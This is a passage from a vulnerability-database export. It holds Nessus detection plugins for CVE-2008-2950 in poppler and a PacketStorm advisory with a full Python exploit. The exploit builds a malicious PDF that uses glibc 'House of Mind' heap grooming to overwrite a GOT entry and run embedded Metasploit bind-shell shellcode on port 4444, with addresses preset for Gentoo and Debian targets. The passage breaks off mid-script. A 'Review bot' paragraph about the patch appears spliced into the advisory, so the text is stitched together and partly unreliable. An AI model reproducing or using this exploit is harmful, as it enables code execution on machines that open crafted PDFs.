value:\"p-cpe:/a:gentoo:linux:poppler\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/07/08\");\n 
script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/07/10\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2008-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"app-text/poppler\", unaffected:make_list(\"ge 0.6.3-r1\"), vulnerable:make_list(\"lt 0.6.3-r1\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Poppler\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-02-21T01:11:03", "bulletinFamily": "scanner", "description": "Felipe Andres Manzano reports :\n\nThe libpoppler pdf rendering library, can free uninitialized pointers, leading to arbitrary code execution. 
This vulnerability results from memory management bugs in the Page class constructor/destructor.", "modified": "2018-11-10T00:00:00", "id": "FREEBSD_PKG_BC20510F4DD411DD93E70211D880E350.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=33471", "published": "2008-07-10T00:00:00", "title": "FreeBSD : poppler -- uninitialized pointer (bc20510f-4dd4-11dd-93e7-0211d880e350)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. 
IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(33471);\n script_version(\"1.15\");\n script_cvs_date(\"Date: 2018/11/10 11:49:41\");\n\n script_cve_id(\"CVE-2008-2950\");\n script_xref(name:\"EDB-ID\", value:\"6032\");\n\n script_name(english:\"FreeBSD : poppler -- uninitialized pointer (bc20510f-4dd4-11dd-93e7-0211d880e350)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Felipe Andres Manzano reports :\n\nThe libpoppler pdf rendering library, can free uninitialized pointers,\nleading to arbitrary code execution. 
This vulnerability results from\nmemory management bugs in the Page class constructor/destructor.\"\n );\n # https://vuxml.freebsd.org/freebsd/bc20510f-4dd4-11dd-93e7-0211d880e350.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?444f7058\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(94);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:poppler\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2008/07/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/07/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/07/10\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2008-2018 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"poppler<0.8.4_2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:15:23", "bulletinFamily": "exploit", "description": "", "modified": "2008-07-10T00:00:00", "published": "2008-07-10T00:00:00", "href": "https://packetstormsecurity.com/files/68074/poppler-poc.txt.html", "id": "PACKETSTORM:68074", "type": "packetstorm", "title": "poppler-poc.txt", "sourceData": "`hi. \nI was in doubt about releasing this because of there is no official patch. \nI suppose at this point anyone could accomplish the same thing so, again \nI'm in doubt. \nA friend once told me that if in doubt take your pants off. I've already \ntried that and I didn't earn no resolution to my conflict so.. I thought I \nshould try the internet version of that strategy. So here we are, enjoy... \nf/ \n \n''' \n#OCERT ADV \n#2008-007 libpoppler uninitialized pointer \n \nDescription: \n \nThe poppler PDF rendering library suffers a memory management bug which \nleads to arbitrary code execution. \n \nThe vulnerability is present in the Page class constructor/destructor. 
The \npageWidgets object is not initialized in the Page constructor if specific \nconditions are met, but it is deleted afterwards in the destructor \nregardless of its initialization. \n \nSpecific PDF files can be crafted which allocate arbitrary memory to \ntrigger the vulnerability. \n \nA new poppler version addressing the issue is scheduled to be released on \nJuly 30th according to maintainer. \n \nThe following patch fixes the issue: \n \ndiff --git a/poppler/Page.cc b/poppler/Page.cc \nindex b28a3ee..72a706b 100644 \n--- a/poppler/Page.cc \n+++ b/poppler/Page.cc \n@@ -230,7 +230,7 @@ GBool PageAttrs::readBox(Dict *dict, char *key, \nPDFRectangle *box) { \n \nPage::Page(XRef *xrefA, int numA, Dict *pageDict, PageAttrs *attrsA, Form \n*form) { \nObject tmp; \n- \n+ pageWidgets = NULL; //Security fix \nok = gTrue; \nxref = xrefA; \nnum = numA; \n \nAffected version: \n \nPoppler <= 0.8.4 \n \nFixed version: \n \nPoppler, N/A \n \nCredit: vulnerability report, patch and PoC code received from Felipe \nAndres Manzano <fmanzano [at] fceia [dot] unr [dot] edu [dot] ar>. \n \nCVE: CVE-2008-2950 \nTimeline: \n \n2008-06-27: vulnerability report received \n2008-06-28: contacted poppler maintainers and affected vendors \n2008-06-30: maintainer confirms issue and patch \n2008-07-07: advisory release \n \nReferences: \n \nPermalink: \nhttp://www.ocert.org/advisories/ocert-2008-007.html \n \n \n####END OCERT \n \n \nSummary: \n======= \n \nThe libpoppler pdf rendering library, can free uninitialized pointers, \nleading to arbitrary code execution. This vulnerability results from \nmemory management bugs in the Page class constructor/destructor. \n \n \nTechnical Description - Exploit/Concept Code: \n============================================= \n \nTests were performed using libpoppler util pdftotext taken from \ngit://git.freedesktop.org/git/poppler/poppler. \nOther versions were tried successfully (the ones shipped with \ndebian/gentoo). 
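Review bot: the added `pageWidgets = NULL;` line makes the unconditional `delete pageWidgets` in `Page::~Page()` a no-op on the `err2` early-exit path, which is the right minimal fix, but it belongs in the constructor's member-initializer list rather than as the first statement of the body, so that any future early exit inserted ahead of it cannot reintroduce the bug. The same destructor also deletes `attrs` unconditionally, so every member released in `~Page()` needs the same guarantee before the first `goto`. The `//Security fix` comment should state the reason (the `goto err2` path leaves the member unassigned) instead of only a label.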
\n \nIn the initialization of a Page object and under certain conditions a \nmember object skips initialization, but then is eventually deleted. This \ncan be conducted to the situation in which an arbitrary pointer is \npassed to the libc free and so it gets appropriate for the malloc \nmaleficarum to enter the scene. \n \nLook at the Page class constructor on Page.cc:231. First at the beginning \nof the function the member object pageWidgets isn't initialized then it \ntries to check if the type of the annotations proposed on the pdf file \nare correct; if not it bails out to the label err2. Note that if some \ninconsistency in the type of the annotation arises the member variable \npageWidgets is never initialized! \n \nPage::Page(XRef *xrefA, int numA, Dict *pageDict, PageAttrs *attrsA, Form \n*form) { \nObject tmp; \n[...] \n// annotations \npageDict->lookupNF(\"Annots\", &annots); \nif (!(annots.isRef() || annots.isArray() || annots.isNull())) { \nerror(-1, \"Page annotations object (page %d) is wrong type (%s)\", \nnum, annots.getTypeName()); \nannots.free(); \ngoto err2; \n} \n \n// forms \npageWidgets = new FormPageWidgets(xrefA, this->getAnnots(&tmp),num,form); \ntmp.free(); \n[...] \nerr2: \nannots.initNull(); \nerr1: \ncontents.initNull(); \nok = gFalse; \n} \n \nBut in the Page class destructor, Page.cc:309, pageWidgets is deleted \nwithout any consideration. The Page destructor is immediately called \nafter the erroneous Page construction. \n \nPage::~Page() { \ndelete pageWidgets; \ndelete attrs; \nannots.free(); \ncontents.free(); \n} \n \n \nIt is worth mentioning that the pdf rendering scenario is friendly with \nthe heap massage techniques because you will find lots of ways to allocate \nor allocate/free memory in the already provided functionality. In the \nPOC I have used repeatedly the 'name' of the fields of a pdf dictionary \nto allocate memory. Each name allocates up to 127 bytes and apparently \nthere is no limit in the number of fields. 
\n \n \nThe following excerpt is a sample verification of the existence of \nthe problem : \n \nlocalhost expl-poppler # python poppler-exploit-rc8.py gentoo-pdftotext \n>test.pdf \nlocalhost expl-poppler # pdftotext test.pdf \nError: PDF file is damaged - attempting to reconstruct xref table... \nError: Annotation rectangle is wrong type \nError: Bad bounding box for annotation \nError: Bad bounding box for annotation \nError: Bad bounding box for annotation \nError: Bad bounding box for annotation \nError: Bad bounding box for annotation \nError: Page annotations object (page 3) is wrong type (integer) \nError: Page count in top-level pages object is incorrect \nError: Couldnt read page catalog \nTrace/breakpoint trap \n \n:) \n \n \nFurther research should be done to accommodate the heap for other \napplications like evince: \nlocalhost expl-poppler # evince test.pdf \n \n(evince:8912): GnomeUI-WARNING **: While connecting to session manager: \nAuthentication Rejected, reason : None of the authentication protocols \nspecified are supported and host-based authentication failed. \n \n** (evince:8912): WARNING **: Service registration failed. \n \n** (evince:8912): WARNING **: Did not receive a reply. Possible causes \ninclude: the remote application did not send a reply, the message bus \nsecurity policy blocked the reply, the reply timeout expired, or the \nnetwork connection was broken. \nError: PDF file is damaged - attempting to reconstruct xref table... \nError: Annotation rectangle is wrong type \nError: Bad bounding box for annotation \nError: Bad bounding box for annotation \nError: Bad bounding box for annotation \nError: Bad bounding box for annotation \nError: Bad bounding box for annotation \nError: Page annotations object (page 3) is wrong type (integer) \n*** glibc detected *** evince: munmap_chunk(): invalid pointer: 0x08100468 \n*** \n \nNote that 0x08100468 is still a provided pointer. But in this try some \nmalloc structure like _heap_info (see 
house of mind) is not correctly \naligned any more. Maybe evince-thumbnailer which is (probably \nmonothreaded) is an easier target. \n \n \nPatch \n===== \n \ndiff --git a/poppler/Page.cc b/poppler/Page.cc \nindex b28a3ee..72a706b 100644 \n--- a/poppler/Page.cc \n+++ b/poppler/Page.cc \n@@ -230,7 +230,7 @@ GBool PageAttrs::readBox(Dict *dict, char *key, \nPDFRectangle *box) { \n \nPage::Page(XRef *xrefA, int numA, Dict *pageDict, PageAttrs *attrsA, Form \n*form) { \nObject tmp; \n- \n+ pageWidgets = NULL; //Security fix \nok = gTrue; \nxref = xrefA; \nnum = numA; \n \n \nPOC: \n=== \n \nWritten in pyploit. It can be used 2 ways , one selecting a preconfigured \ntarget like *gentoo-pdftotext* or the other in which you could pass some \nmalloc/free execution trace moddifing parameters. \n \n''' \n########################################################################## \n#### Felipe Andres Manzano * fmanzano@fceia.unr.edu.ar #### \n#### some shit on http://felipe.andres.manzano.googlepages.com/home #### \n########################################################################## \n \nimport struct \nimport struct \nimport math \nimport os \n \nimport sys \n \n## print \"%.400f\"%d wont work :( ... 
so a quick double printing class \nclass Doubles: \ndef __init__(self, precision=400): \nself.precision=precision \n \ndef pdficateint(self,i1,i2): \ns = struct.pack(\"@L\",i1) + struct.pack(\"@L\",i2) \nreturn self.pdficatestr(s) \n \ndef pdficate(self,s): \nrslt = \" \" \nfor pos in range (0,len(s)/8): \nrslt+=self.pdficatestr(s[(pos*8):(pos*8)+8])+\" \" \nreturn rslt; \n \ndef pdficatestr(self, s): \nd = struct.unpack(\"d\",s)[0] \nrslt=\" \" \nif(d<0.0): \nrslt+=\"-\" \nd=-d \nrslt+=\"%d.\"%int(math.floor(d)) \nmyd=math.floor(d) \nscale=0.1 \nnines=0 \nfor p in range(1,self.precision): \nfor i in range(1,10): \nif (myd+scale*i) > d: \ni-=1 \nbreak \nif i==9: \nif nines>6: \nreturn rslt \nelse: \nnines+=1 \nelse: \nnines=0 \nrslt+=(\"%02d\"%i)[1] \nmyd+=scale* i \nscale=scale*0.1 \nreturn rslt \n \n##From Malloc maleficarum \n##http://packetstormsecurity.org/papers/attack/MallocMaleficarum.txt \nclass HouseOfMind: \n \nHEAP_MAX_SIZE=(1024*1024) \nJMP='\\xeb' \nNOP='\\x90' \nPAD='\\x00' \nPREV_INUSE=0x1 \nIS_MMAPPED=0x2 \nNON_MAIN_ARENA=0x4 \ndef __init__(self, base, where, payload, entrypoint): \nself.base=base \nself.where=where-0xc \nself.heap_info = (base+self.HEAP_MAX_SIZE-1)& ~(self.HEAP_MAX_SIZE-1) \nself.payload=payload \nself.entrypoint=entrypoint \nself.chunkaddress=0 \nif (self.entrypoint > 0xff - 8): \nthrow \n \n## lendian, 32bit only \n## See The Malloc Maleficarum / House of Mind \ndef mind(self): \nrslt = \"\" \n#first we add padding to reach the next Heap border \nrslt+=self.PAD*(self.heap_info-self.base) \n \n#now we add a _heap_info pinting to a malloc_state of our own \n#and dictating a generous size for this *heap* \n##arena.c:59 //struct _heap_info \nrslt += struct.pack(\"<L\", self.heap_info + 16) # Arena for this heap. \nrslt += struct.pack(\"<L\", 0x0000000) # Previous heap. (BUG: Don't \nknow what M does with this) \nrslt += struct.pack(\"<L\", 0x7000000) # Current size in bytes. 
\nrslt += struct.pack(\"<L\", 0x7000000) # Size in bytes that has been \nmprotected PROT_READ|PROT_WRITE \n#here arena.c suggest some padding. We just don't do it. \n \n \n#now we add the malloc_state of our own \n##malloc.c:2317 //struct malloc_state \nrslt += struct.pack(\"<L\", 0x00000000) # mutex for \nserializing access * 0 -> unlocked. \nrslt += struct.pack(\"<L\", 0x000ffff) # Flags * We need \nNONCONTIGUOUS_BIT to be on for passing \n# condition on malloc.c:@@@@@ \n \n#Note: We assume not Thread's stats# \n \nrslt += struct.pack(\"<L\", 0x00000000)*10 #Fastbins * We \ndon use them. \nrslt += struct.pack(\"<L\", 0x00000000) #Base of the \ntopmost chunk--not otherwise kept in a bin \n#We need it to be \ndifferent to our \nchunk pointer for \n#passing condition \non malloc.c:@@@@, \n0 is safe enough \nrslt += struct.pack(\"<L\", 0x00000000) #The remainder from \nthe most recent split of a small request \n \n#Here it come the bins \n##The first one is the Unsorted bin! \n##Free will write the *chunk* to the containing address +0xc; so it \n##shout point to the GOT pointer to 'overload' -0xc \nrslt += struct.pack(\"<L\", self.where); \n \nrslt += struct.pack(\"<L\", 0x0000000)* 253 #All the other \nunused bins go to 0 * ~ \nrslt += struct.pack(\"<L\", 0x00000000)*4 #Bitmap of \nbins \n \nrslt += struct.pack(\"<L\", 0x00000000) #Linked list next \nmalloc_state \n \n##Memory allocated from the system in this arena. \nrslt += struct.pack(\"<L\", 0x70000000) #system_mem * Need to \nbe big enough for passing the \n#condition on malloc:@@@@ \nrslt += struct.pack(\"<L\", 0x00000000) #max_system_mem ?? 
\n \n#needed for chunk aligment \nrslt += self.PAD*4 \n \n#CHUNKS \n# An allocated chunk looks like this: \n# \n# chunk-> \n+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ \n# | Size of previous chunk, if allocated \n| | \n# \n+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ \n# | Size of chunk, in bytes \n|M|P| \n# mem-> \n+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ \n# | User data starts here... \n. \n# . \n. \n# . (malloc_usable_size() bytes) \n. \n# . \n| \n#nextchunk-> \n+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ \n# | Size of chunk \n| \n# \n+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ \n \n \n#chunk 0 There isn't a single reason for this to exist * \nwabaaaaaaaaaa! \n# rslt += struct.pack(\"<L\", 16) #Size of previous chunk * \nUNUSED \n# rslt += struct.pack(\"<L\", 64) #Size of chunk, in bytes. \nNo flags \n# rslt += self.PAD*(64-8) \n \n#chunk 1 THE CHAMP \nrslt += \n\"\\x40\"+self.JMP+struct.pack(\"B\",5+self.entrypoint)+self.PAD \n#Size of previous chunk *DOESN'T MATTER! \nrslt += \nstruct.pack(\"<L\",8+len(self.payload)|self.PREV_INUSE|self.NON_MAIN_ARENA) \n# Size of this chunk \n#TODO: \nExplain \nflags, \nlink \ncode \n \n##Save the chunk1 address \nself.chunkaddress= self.base + len(rslt) \nrslt += self.payload #payload (payload[entrypoint] should \ncontain shellcode)! \n \n#chunk 2 THE LAST? \nrslt += struct.pack(\"<L\",8+len(self.payload)) #Size of \nprevious chunk \n#TODO: link where \nit is checked \n \nrslt += struct.pack(\"<L\",64|self.PREV_INUSE|self.NON_MAIN_ARENA) \n#Size of this chunk \n#Neds \nto \nbe \ngreater \nthan \n2 \n* \nSIZE_SZ, \n#TODO: \nExplain \nflags, \nlink \ncode \n \nrslt += self.PAD*(64-8) \n \n#chunk 3 THE LAST! 
\nrslt += struct.pack(\"<L\",64) #Size of previous chunk \nrslt += struct.pack(\"<L\",self.PREV_INUSE) #Size of this chunk * \nHere we need just the PREV_INUSE bit set \nreturn rslt \n#no need no payload \n \n#For constructing a minimal pdf file \nclass PDFObject: \ndef __init__(self,toks): \nself.toks=toks \nself.n=0 \nself.v=0 \n \ndef __str__(self): \ns=\"%d %d obj\\n\"%(self.n,self.v) \nfor t in self.toks: \ns+=t.__str__() \ns+=\"\\nendobj\\n\" \nreturn s \n \n \nclass PDFDict(): \ndef __init__(self): \nself.dict = [] \n \ndef add(self,name,obj): \nself.dict.append((name,obj)) \n \ndef __str__(self): \ns=\"<<\" \nfor name,obj in self.dict: \ns+=\"/%s %s\\n\"%(name,obj) \ns+=\">>\" \nreturn s \n \nclass PDFName(): \ndef __init__(self,s): \nself.s=s \ndef __str__(self): \nreturn \"/%s\"%self.s \n \nclass PDFString(): \ndef __init__(self,s): \nself.s=s \ndef __str__(self): \nreturn \"(%s)\"%self.s \n \nclass PDFRef(): \ndef __init__(self,obj): \nself.obj=obj \ndef __str__(self): \nreturn \"%d %d R\"%(self.obj.n,self.obj.v) \n \n \nclass PDFDoc(): \ndef __init__(self): \nself.objs=[] \n \ndef add(self,obj): \nobj.v=0 \nobj.n=1+len(self.objs) \nself.objs.append(obj) \n \ndef _header(self): \nreturn \"%PDF-1.5\\n\" \n \ndef __str__(self): \ndoc1 = \"%PDF-1.5\\n\" \nxref = {} \nfor obj in self.objs: \nxref[obj.n] = len(doc1) \ndoc1=doc1+obj.__str__() \nposxref=len(doc1) \ndoc1+=\"xref\\n\" \ndoc1+=\"0 %d\\n\"%len(self.objs) \ndoc1+=\"0000000000 65535 f\\n\" \nfor xr in xref.keys(): \ndoc1+= \"%010d %05d n\\n\"%(xref[xr],0) \ndoc1+=\"trailer\\n\" \ntrailer = PDFDict() \ntrailer.add(\"Size\",len(self.objs)) \ntrailer.add(\"Root\",\"2 0 R\") \ndoc1+=trailer.__str__() \ndoc1+=\"\\nstartxref\\n%d\\n\"%posxref \ndoc1+=\"%%EOF\\n\\n\" \n \nreturn doc1 \n \n#The ... 
\"POC\" \nclass PopplerExpl: \n \ndef __init__(self,shellcode): \nself.shellcode=shellcode \nself.d = Doubles() \n \n#this wraps the shellcode in an encoding supported by 'doubles' \ndef wrap(self,scode,where): \nwrapscode = '\\xb8' + struct.pack(\"<L\",where)+\"\\x90\"*3 \n#movl where, %eax;nop;nop;nop \nfor c in scode: \nwrapscode += \"\\xc6\\x00%c\\x40\"%c \n#movb $c, (%eax); inc %eax \nif (len(scode)%2!=0): \nwrapscode += \"\\xc6\\x00\\xcc\\x40\" \n#movb $0xcc, (%eax); inc %eax \nwrapscode += \"\\xb8\" + struct.pack(\"<L\",where)+\"\\x90\"*3 \n#movl where, %eax;nop;nop;nop \nwrapscode += \"\\x50\\xc3\" \n#push %eax;ret \nreturn wrapscode + '\\x00'*(1000-len(wrapscode)) \n#padding to a supported size \n \ndef make(self,base,got,massage=None): \n#here we generate the house of mind thingy \n#The House Of Mind instance. \n#Te first word es passed tu a gfree so we put 0 so we ignore that \nfree. \nhm = HouseOfMind(base, got, \"\\x00\"*16+ \nself.wrap(self.shellcode,base), 16) \nmind = hm.mind() \n \ndoc = PDFDoc() \ndoc.add(PDFObject([\"<</Length 3>>\\nstream...\\nendstream\\n\"])) \ncatalog = PDFDict() \ncatalog.add(\"Type\", PDFName(\"Catalog\")) \ncatalog.add(\"Outlines\", \"3 0 R\") \ncatalog.add(\"Pages\", \"4 0 R\") \ncatalog.add(\"AcroForm\", \"<</Fields [ 7 0 R ]>>\") \n \n#for i in range(0,1000): \n# catalog.add( \"C\"*82 + \"%05d\"%i, 0) \n \noutlines = PDFDict() \noutlines.add(\"Type\", PDFName(\"Outlines\")) \noutlines.add(\"Count\",0) \n \npages = PDFDict() \npages.add(\"Type\", PDFName(\"Pages\")) \npages.add(\"Kids\",\"[ 8 0 R 6 0 R 5 0 R ]\") \npages.add(\"Count\",\"3\") \n \ndoc.add(PDFObject([catalog])) \ndoc.add(PDFObject([outlines])) \ndoc.add(PDFObject([pages])) \n \npage1 = PDFDict() \npage1.add(\"Type\", PDFName(\"Page\")) \npage1.add(\"Parent\", \"4 0 R\") \npage1.add(\"MediaBox\",\"[ 0 0 612 792 ]\") \npage1.add(\"Contents\", \"1 0 R\") \npage1.add(\"Resources\", \"<< /ProcSet 6 0 R >>\") \npage1.add(\"Annots\", \"0\") \n \n#malloc-fill-free 
lots of chunks of the size then used by Page \nclass(88) \nfor pagesize in range(88,126): \npayload = \n(\"\".join([\"#%02x\"%ord(struct.pack(\"@L\",hm.chunkaddress)[i]) \nfor i in range (0,4)]))*19 \npayload += \"B\"*(pagesize-(len(payload)/3)) \nfor i in range(0,10): \npage1.add(payload, 0) \n \ndoc.add(PDFObject([page1])) \n \npage1 = PDFDict() \npage1.add(\"Type\", PDFName(\"Page\")) \npage1.add(\"Parent\", \"4 0 R\") \npage1.add(\"MediaBox\",\"[ 0 0 612 792 ]\") \npage1.add(\"Contents\", \"1 0 R\") \npage1.add(\"Resources\", \"<< /ProcSet 6 0 R >>\") \npage1.add(\"Annots\", \"[7 0 R 7 0 R 7 0 R 7 0 R]\") \n \n#massage session 1 \nsize=127 \nfor i in range(0,massage[0]): \npage1.add( \"A\"*(size-5)+(\"%05d\"%(i)), \"B\"*size) \n \ndoc.add(PDFObject([page1])) \nannots = PDFDict() \nannots.add(\"Subtype\",\"/Text\") \n \nannots.add(\"BS\", \"<</D [ \"+ \n\"0 \"*massage[1] + \nself.d.pdficate(mind)+ \n#more massage>? \n\"0.0 \"*massage[2] + \" ]>>\") \n \nannots.add(\"FT\", \"/Tx\") \ndoc.add(PDFObject([annots])) \n \npage1 = PDFDict() \npage1.add(\"Type\", PDFName(\"Page\")) \npage1.add(\"Parent\", \"4 0 R\") \npage1.add(\"MediaBox\",\"[ 0 0 612 792 ]\") \npage1.add(\"Contents\", \"1 0 R\") \npage1.add(\"Resources\", \"<< /ProcSet 6 0 R >>\") \npage1.add(\"Annots\", \"[7 0 R]\") \ndoc.add(PDFObject([page1])) \ndoc.add(PDFObject([\"<<>>\"])) \ndoc.add(PDFObject([\"[ /PDF ]\"])) \nreturn doc.__str__() \n \n \n##Main \n## Not every shellcode will work by now \n## Only the ones that taken by 8bytes form an ieee754 double presicion float \n## with an exponent not too positive ... 
:) \n \n## linux_ia32_bind - LPORT=4444 Size=84 Encoder=None http://metasploit.com \nscode = \"\\x31\\xdb\\x53\\x43\\x53\\x6a\\x02\\x6a\\x66\\x58\\x99\\x89\\xe1\\xcd\\x80\\x96\" \nscode += \"\\x43\\x52\\x66\\x68\\x11\\x5c\\x66\\x53\\x89\\xe1\\x6a\\x66\\x58\\x50\\x51\\x56\" \nscode += \"\\x89\\xe1\\xcd\\x80\\xb0\\x66\\xd1\\xe3\\xcd\\x80\\x52\\x52\\x56\\x43\\x89\\xe1\" \nscode += \"\\xb0\\x66\\xcd\\x80\\x93\\x6a\\x02\\x59\\xb0\\x3f\\xcd\\x80\\x49\\x79\\xf9\\xb0\" \nscode += \"\\x0b\\x52\\x68\\x2f\\x2f\\x73\\x68\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe3\\x52\\x53\" \nscode += \"\\x89\\xe1\\xcd\\x80\" \n \n#expl = PopplerExpl( ('\\xcc'+'\\x90')*((160-16)/2)) \nexpl = PopplerExpl(scode) \n \ntargets = { \n\"gentoo-pdftotext\":(0x08100000, 0x804c014, 1863, 20, 400), \n\"debian4-pdftotext\":(0x08100000, 0x804bb18, 1879, 33, 400), \n\"gentoo-evince-thumbnailer\": (0x8100000, 0x080712c4, 907, 34, 200), \n \n} \n \nif len( sys.argv )==1: \nprint \"Comments -> fmanzano@fceia.unr.edu.ar\" \nprint \"Usage 1:\" \nprint \" %s \"%sys.argv[0], targets.keys() \nprint \"Usage 2:\" \nprint \" %s massage1 massage2 massage3 base got\"%sys.argv[0] \nprint \" The idea here is to align the _heap_info struct that \ncommences with 0x08?00010 \" \nprint \" to the address 0x8?0000. For this pourpose move \nmassage1/2/3. \" \nprint \" THIS STUPIDLY SIMPLE METHOD WOULD WORK FOR VERY FEW \nAPPS !\" \nprint \" base is the 1024*1024 bytes aligned address to which we \nare trying to align everything\" \nprint \" got is the addres of the got where the thing is going \nto write the shellcode address\" \nprint \" BTW by now the shellcode is nop;int 3;nop...grooovy!.. \nNOT\" \nelif len( sys.argv )>2: \nprint expl.make(int(sys.argv[4][2:],16), int(sys.argv[5][2:],16), \n(int(sys.argv[1]),int(sys.argv[2]),int(sys.argv[3]))) \nelse: \n#base: the expected heap limit (08100000,08200000,....08f00000... 
